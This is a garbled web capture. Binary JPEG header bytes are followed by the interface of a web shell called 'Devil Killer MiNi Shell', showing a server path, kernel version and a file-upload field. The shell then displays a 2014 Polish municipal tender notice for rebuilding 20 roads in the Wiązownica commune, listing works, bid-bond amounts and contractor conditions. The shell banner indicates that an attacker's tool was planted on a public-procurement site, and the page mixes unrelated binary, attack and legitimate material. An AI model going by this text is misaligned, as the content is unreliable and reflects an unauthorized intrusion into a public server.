JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140227/67106-N-2014.html

<p class="kh_header"><b>Wiązownica: Przebudowa dróg gminnych na terenie gminy Wiązownica</b><br>
<b>Numer ogłoszenia: 67106 - 2014; data zamieszczenia: 27.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Wiązownica , Wiązownica 208, 37-522 Wiązownica, woj. podkarpackie, tel. 016 622-36-31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wiazownica.regiony.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg gminnych na terenie gminy Wiązownica.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych na zadaniu inwestycyjnym     
    o nazwie: Przebudowa dróg gminnych na terenie gminy Wiązownica.
    W ramach  przedmiotowego zamówienia  gruntownej  przebudowie zostaną poddane  drogi     
    gminne o  nawierzchniach  tłuczniowych, kamiennych,  betonowych lub żużlowych.  
    Przebudowa  nawierzchni dróg będzie polegała na  oczyszczeniu  istniejącej warstwy 
    konstrukcyjnej, wyrównaniu   nawierzchni, wykonaniu  podbudowy z kruszywa łamanego 
    stabilizowanego mechanicznie, wykonaniu  nawierzchni z betonu  asfaltowego o uziarnieniu 
    0/12,8 o grubości warstwy ścieralnej 4 cm.  oraz robót wykończeniowych dot. uzupełnienia  i  
    utwardzenia poboczy drogi.
    Przedmiot zamówienia zostanie podzielony na 20 odrębnych zadań (części).
Zadanie (cześć) 1 	Przebudowa drogi gminnej w Wiązownicy,  dz. nr ew. 1219, 1223 w km 
                                   0+000 - 0+182
-	 mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-	 wykonanie podbudowy z kruszywa łamanego 0/32, gr. warstwy 7 cm.
-	 wykonanie podbudowy z kruszywa łamanego 0/64 gr. warstwy 10 cm.
-	 wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr.  4 cm
-	 uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 5 cm
-	 uzupełnienie poboczy gruntem rodzimym śr. gr. warstwy po zagęszczeniu 5 cm
Zadanie (cześć) 2	PRZEBUDOWA  DROGI GMINNEJ w Wiązownicy,  nr ew. dz.  965, 963
                                   w km. 0+000 - 0+261
-	wykonanie podbudowy z kruszywa łamanego  0/32 gr. warstwy 5 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 5 cm
Zadanie (cześć) 3	PRZEBUDOWA DROGI GMINNEJ w Wiązownica, dz. nr ewid. 1219, 1203	                       w km  0+000 ÷ 0+156 
-	wykonanie podbudowy z kruszywa łamanego  0/32 gr. warstwy 5 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm
Zadanie (cześć)   4	PRZEBUDOWA DROGI GMINNEJ w Szówsko, (boczna ul.  Parkowej),  
                                  w km 0+000 ÷ 0+091 dz. nr ewid. 723
-	wykonanie podbudowy z kruszywa łamanego  0/32 gr. warstwy 7 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm
Zadanie (cześć)   5	PRZEBUDOWA  DROGI GMINNEJ w Szówsku, (boczna ul. Sanowej-Łącznik)              
                                   nr  ew. dz.  421 
-	mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-	wykonanie podbudowy z kruszywa łamanego 0/64, grubość warstwy 10 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 5 cm
Zadanie (cześć)  6	PRZEBUDOWA  DROGI GMINNEJ w Szówsku - ul. Sanowa, nr ew. dz. 653
                                  w km 0+000 ÷0+653 
-	mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-	wykonanie podbudowy z kruszywa łamanego 0/64, grubość warstwy 10 cm. i 15 cm.
-	wykonanie podbudowy z kruszywa łamanego 0/32, grubość warstwy 7 cm
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 5 cm
-	uzupełnienie poboczy gruntem rodzimym śr. gr. warstwy po zagęszczeniu 5 cm
Zadanie (cześć)  7	PRZEBUDOWA  DROGI GMINNEJ w Szówsku (za cmentarzem),  nr  ew. dz.  1016  w km. 0+000 - 0+168 
-	wykonanie podbudowy z kruszywa łamanego 0/32, grubość warstwy  7 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr.  4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm
Zadanie 8	PRZEBUDOWA  DROGI GMINNEJ w  Szówsku (Parking) w  nr ew. dz. 1019/1
-	mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-	wykonanie podbudowy z kruszywa łamanego 0/64, grubość 12 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 5 cm
-	uzupełnienie poboczy gruntem rodzimym śr. gr. warstwy po zagęszczeniu 5 cm
Zadanie 9	PRZEBUDOWA  DROGI GMINNEJ w Szówsku,   w  nr ew. dz. 957 
-	wykonanie podbudowy z kruszywa łamanego 0/32, grubość warstwy  5 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
Zadanie 10	PRZEBUDOWA  DROGI GMINNEJ w Ryszkowej Woli (teren szkoły),   w  nr ew. dz.  238/9 
-	regulacja pionowa studzienek kanalizacyjnych,
-	mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-	wykonanie podbudowy z kruszywa łamanego 0/64, grubość warstwy10 cm
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 5 cm
-	uzupełnienie poboczy gruntem rodzimym śr. gr. warstwy po zagęszczeniu 5 cm
Zadanie 11	PRZEBUDOWA  DROGI  w Zapałowie (Parking) 
-	wykonanie podbudowy z kruszywa łamanego 0/64  gr. warstwy 10 cm
-	Wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr.  4 cm
Zadanie 12	PRZEBUDOWA  DROGI GMINNEJ w Zapałowie (Parking) w  nr ew. dz.  1217
-	regulacja pionowa studzienek kanalizacyjnych i technicznych,
-	mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-	wykonanie podbudowy z kruszywa łamanego 0/64, grubość warstwy10 cm
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 5 cm
-	uzupełnienie poboczy gruntem rodzimym śr. gr. warstwy po zagęszczeniu 5 cm


Zadanie 13	PRZEBUDOWA  DROGI GMINNEJ w Zapałowie (osiedle),  nr ew. dz. 1216/3
                       w km: 0+000 - 0+155 
-	mechaniczne oczyszczenie warstwy konstrukcyjnej istniejącej nawierzchni
-	skropienie istniejącej nawierzchni emulsją w ilości 0,6 kg/m2
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 5 cm
Zadanie 14	PRZEBUDOWA  DROGI GMINNEJ w Radawie (Kliszówka) 
                       w km. 0+000 - 0+380 
-	mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-	wykonanie podbudowy z kruszywa łamanego 0/64, grubość   10 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr.  4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm
Zadanie 15	PRZEBUDOWA  DROGI GMINNEJ w Radawie (GOWIR)  nr ew. dz.  604, 605/2, 
                       w km. 0+000 - 0+477 
-	wykonanie obrzeży betonowych na ławie oporowej
-	wykonanie koryta na poszerzeniach jezdni , głębokość 10 cm.
-	wykonanie podbudowy z kruszywa łamanego 0/32  grubość warstwy 10 cm.
-	oczyszczenie warstwy konstrukcyjnej istniejącej nawierzchni
-	skropienie istniejącej nawierzchni emulsją w ilości 0,6 kg/m2
-	wykonanie podbudowy z kruszywa łamanego 0/32  grubość warstwy 5 cm.
-	wyrównanie istniejącej nawierzchni z betonu asfaltowego o uziarnieniu 0/12 warstwa  gr.2cm
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr.  4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm
Zadanie 16  	PRZEBUDOWA  DROGI GMINNEJ w Piwodzie,   nr  ewid.  dz. 965, 963
                       w km:  1+317 - 1+997
-	wykonanie podbudowy z kruszywa łamanego 0/32, grubość   5 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm
Zadanie (cześć)  17	PRZEBUDOWA  DROGI GMINNEJ w Radawie,    nr  ew. dz.  153, 
                        w km. 0+000 - 0+360  
-	mechaniczne profilowanie i zagęszczanie podłoża gruntu kat. I-IV
-	wykonanie podbudowy z kruszywa łamanego 0/63, grubość warstwy 10 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr.  4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm
Zadanie (cześć)  18	PRZEBUDOWA  DROGI GMINNEJ w Nielepkowicach,    nr  ew. dz. 370, 
                        w km. 0+000 - 0+285 
-	mechaniczne profilowanie i zagęszczanie podłoża gruntu kat. I-IV
-	wykonanie podbudowy z kruszywa łamanego 0/63, grubość 12 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr.  4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm
Zadanie (cześć)  19	PRZEBUDOWA  DROGI GMINNEJ w Manasterzu,     nr  ew. dz. 494, 
                        w km. 0+000 - 0+240 
-	oczyszczenie warstwy konstrukcyjnej istniejącej nawierzchni
-	skropienie istniejącej nawierzchni emulsją w ilości 0,6 kg/m2
-	wyrównanie istniejącej nawierzchni z betonu asfaltowego o uziarnieniu 0/12 warstwa  gr.2cm
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr.  4 cm
-	uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm
Zadanie (cześć)  20	PRZEBUDOWA  DROGI GMINNEJ w Nielepkowicach,  nr  ew. dz. 206, 
                        w km. 0+000 - 0+130 
-	mechaniczne profilowanie i zagęszczanie podłoża gruntu kat. I-IV
-	wykonanie podbudowy z kruszywa łamanego 0/63, grubość warstwy 12 cm.
-	wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr.  4 cm
-	Uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm

Podstawowe warunki prowadzenia i wykonania robót stanowiących przedmiot zamówienia:
-	Wykonawca zobowiązany jest przed rozpoczęciem robot do wykonania projektu
            organizacji ruchu zastępczego na czas realizacji robot (jeżeli jest to niezbędne):
-	Wykonawca jest zobowiązany wykonywać przedmiot Umowy zgodnie z obowiązującymi w tym zakresie przepisami prawa, obowiązującymi normami, warunkami technicznymi wykonania robot oraz wiedzą techniczną.
-	Wykonawca zobowiązany jest do  organizacji placu budowy i urządzenia i oznakowania , jeżeli jest to niezbędne. 
-	Wykonawca jako wytwórca odpadów w rozumieniu art. 3 ust. 3 pkt. 22 ustawy z dnia
            27.04.2001r. o odpadach (t.j. Dz. U. z 2010r. Nr 185, poz. 1243 z późniejszymi zmianami)
            ma obowiązek zagospodarowania powstałych podczas realizacji zadania odpadów i ustawą
            z dnia 27.04.2001 r. Prawo ochrony środowiska (Dz.U. z 2008 r. Nr 25, poz. 150).
-	W cenie ryczałtowej Wykonawca ma obowiązek uwzględnić miejsce, odległość, koszt
            wywozu, utylizacji i składowania odpadów.
-	Wykonawca ponosi pełną odpowiedzialność za wszelkie działania lub zaniechania własne, swoich pracowników oraz podmiotów, którymi się posługuje lub przy pomocy których wykonuje przedmiot umowy.
-	Wykonawca ma obowiązek zgłosić Zamawiającemu wykonanie robot zanikających i ulegających zakryciu, przed ich zakryciem, celem odbioru.
-	Wykonawca ma obowiązek zgłosić gotowość do odbioru przedmiotu Umowy i uczestniczyć w odbiorze.
-	W dniu pisemnego zgłoszenia Zamawiającemu faktu wykonania przedmiotu umowy i gotowości do odbioru Wykonawca przekaże Zamawiającemu wszystkie dokumenty potrzebne do odbioru końcowego, umożliwiające ocenę prawidłowego wykonania przedmiotu umowy.
Wszystkie nazwy własne urządzeń i materiałów użyte w dokumentacji projektowej oraz
przetargowej są podane przykładowo i określają jedynie minimalne oczekiwane parametry
jakościowe oraz wymagany standard i mogą być zastąpione przez inne równoważne lub lepsze,
jednak obowiązek udowodnienia równoważności, zgodnie z art. 30 ust. 5 ustawy, należy do
Wykonawcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 20.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest  wnieść wadium  
    w wysokości:
-	zadanie (część)  1 	w  kwocie    600 zł.   
-	zadanie (część)  2  	w  kwocie    500 zł.   
-	zadanie (część)  3  	w  kwocie    300 zł.   
-	zadanie (część)  4  	w  kwocie    200 zł.   
-	zadanie (część)  5  	w  kwocie    200 zł.   
-	zadanie (część)  6  	w  kwocie  1500 zł.   
-	zadanie (część)  7  	w  kwocie    400 zł.   
-	zadanie (część)  8  	w  kwocie  1200 zł.   
-	zadanie (część)  9  	w  kwocie    100 zł.   
-	zadanie (część)  10  	w  kwocie    400 zł.   
-	zadanie (część)  11 	w  kwocie    200 zł.   
-	zadanie (część)  12  	w  kwocie    400 zł.   
-	zadanie (część)  13  	w  kwocie    200 zł.   
-	zadanie (część)  14  	w  kwocie    800 zł.   
-	zadanie (część)  15  	w  kwocie    700 zł.   
-	zadanie (część)  16  	w  kwocie 1 200 zł.   
-	zadanie (część)  17  	w  kwocie    700 zł.   
-	zadanie (część)  18  	w  kwocie    700 zł.   
-	zadanie (część)  19  	w  kwocie    300 zł.   
-	zadanie (część)  20  	w  kwocie    300 zł.  

 2. Wykonawca może wnieść wadium  w jednej lub kilku  formach w art. 45 ust. 2 ustawy Pzp, tj.      1) w pieniądzu;      2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - 
         kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;       3) w gwarancjach bankowych;
     4) gwarancjach ubezpieczeniowych;
     5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt. 2 ustawy    
         z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 
         Nr 42, poz. 275 oraz z 2007 r. z e zmianami).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4. Wadium w pieniądzu należy wnieść  przelewem na konto Zamawiającego w BS Jarosław    
    o/Wiązownica, numer konta 56 9096 1014 2002 1400 0202 0001    
5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje 
    termin uznania kwoty na rachunku zamawiającego. 
6. W przypadku wniesienia wadium  formie innej niż w pieniądzu - oryginał dokumentu   
    potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania 
    ofert w  siedzibie Zamawiającego - Urząd Gminy Wiązownica, w kasie Urzędu pok. nr 44  
    II p. a  kserokopię dokumentu poświadczoną za zgodność z oryginałem należy dołączyć 
    do oferty.
7. W przypadku składania oferty wspólnej, wadium wniesione przez jednego ze
    wspólników uważa się za wniesione prawidłowo.
8. Brak wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje 
    wykluczenie  Wykonawcy na podstawie art. 24 ust. 2 pkt. 2
9. Zwrotu  i zatrzymania złożonego wadium przetargowego  zamawiający dokona zgodnie 
    z przepisami art. 46 ust. 1-5  ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. 
      Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty 
       oświadczenia wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli w okresie ostatnich 5 lat przed upływem  terminu 
       składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie z 
       zasadami sztuki budowlanej wykonali i prawidłowo ukończyli co najmniej 2 roboty budowlane 
       odpowiadające  swoim rodzajem i zakresem  przedmiotowi zamówienia, tzn. polegającą na 
       budowie, przebudowie lub  modernizacja dróg  o  wartości co najmniej  100 000 zł brutto 
       każda. 
       Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty: 
       a) oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu - art. 22 ust.1 
       b) wykazu wykonanych zamówień wg. zał. do siwz.
       c) dowodów  potwierdzających, że wykazane roboty budowlane zostały wykonane w sposób 
           należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
        Dowodami dot. wykonanych robót budowlanych są:
        - poświadczenia odpowiednich podmiotów lub inne dokumenty, jeżeli z uzasadnionych 
          przyczyn wykonawca nie jest w stanie uzyskać tych poświadczeń.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca dysponuje lub będzie dysponował
       potencjałem technicznym niezbędnym do wykonania przedmiotu umowy, w szczególności:
-	układarka  mas bitumicznych - 1 szt.
-	walec drogowy stalowy gładki  1 szt.   
-	walec ogumiony  1 szt.
       Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty: 
       a) oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu - art. 22 ust.1 
       b) wykazu  potencjału (sprzętu) technicznego  wg. zał. do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za  spełniony jeżeli   dysponują  osobami zdolnymi do wykonania  
        zamówienia,  lub przedłożą pisemnym zobowiązaniem innych podmiotów do udostępnienia 
        tych osób, w szczególności:
1)	dysponują co najmniej 1 osobą  (kierownik budowy) posiadający uprawnienia do kierowania budową i robotami  budowlanymi o specjalności:
-	konstrukcyjno - budowlanej  lub drogowej lub odpowiadające im inne
                                 uprawnienia budowlane wydane na podstawie  wcześniej obowiązujących 
                                  przepisów w powyższym zakresie. 
        Przez uprawnienia należy rozumieć: uprawnienia budowlane, o których mowa w ustawie z 
        dnia 7 lipca 1994 r. Prawo budowlane (Dz.U.2013.1409 - j.t.) oraz w Rozporządzeniu Ministra 
        Transportu Budownictwa z dnia 28 kwietnia 2006r. w sprawie samodzielnych funkcji 
        technicznych w budownictwie (Dz. U. z 2006 r. Nr 83, poz.578 ze zm.) lub odpowiadające im 
        ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów 
        prawa, 
     Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty: 
        a) oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu - art. 22 ust.1 
        b) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wg. zał. do siwz,
        c) oświadczenie wykonawcy, że wskazane w wykazie osoby posiadają wymagane uprawnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawcy są:
-  ubezpieczeni od odpowiedzialności cywilnej w zakresie działalności związanej z 
   przedmiotem zamówienia na kwotę co najmniej 300 000 złotych (słownie: trzysta tysięcy 
   złotych) dla jednego lub wszystkich zadań (części).
      Ocena spełniania warunku zostanie dokonana na podstawie załączonego do oferty: 
      a) oświadczenia wykonawcy o spełnianiu warunków udziału w postępowaniu - art. 22 ust.1
      b) opłaconej polisy ubezpieczenia OC z tytułu prowadzonej działalności gospodarczej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
